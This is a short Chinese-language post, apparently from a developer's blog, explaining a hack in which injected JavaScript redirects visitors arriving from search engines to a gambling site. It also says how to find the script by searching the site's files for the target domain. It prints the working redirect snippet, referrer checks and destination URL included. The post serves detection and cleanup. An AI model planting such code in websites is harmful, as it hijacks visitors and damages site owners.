高明篡改:判断来源网站是搜索引擎时,跳转到非法网站,浏览器访问时正常浏览;
这种篡改方式比较高端,一般的小白程序员是发现不了的,原因如下:
1、查看源代码时无异常;
2、用浏览器访问时可以正常访问,从其他网站点进来也可以正常访问,就好像网站没有被攻击一样;
3、只有从搜索引擎访问进来时才跳转到赌博网站链接。
很容易让程序员误以为是以前被攻击了已修复,而搜索引擎还保留历史快照的原因,还等着搜索引擎更新快照。
实际是网站被攻击了未修复。
解决方式很简单:
直接在程序中所有文件搜索跳转到的非法域名,很容易搜索到。
例如下图:
我们就找到了以下JS代码,打开后可以看到代码如下:
document.writeln("<script LANGUAGE=\"Javascript\">");
document.writeln("var s=document.referrer");
document.writeln("if(s.indexOf(\"baidu\")>0 || s.indexOf(\"sogou\")>0 || s.indexOf(\"soso\")>0 ||s.indexOf(\"sm\")>0 ||s.indexOf(\"uc\")>0 ||s.indexOf(\"bing\")>0 ||s.indexOf(\"yahoo\")>0 ||s.indexOf(\"so\")>0 )");
document.writeln("location.href=\"https://1325044.com\";");
document.writeln("</script>");
JS的代码意思就是获取来源网址,如果来源网址包含:baidu、sogou、soso、sm、uc、bing、yahoo、so时,跳转到其他链接。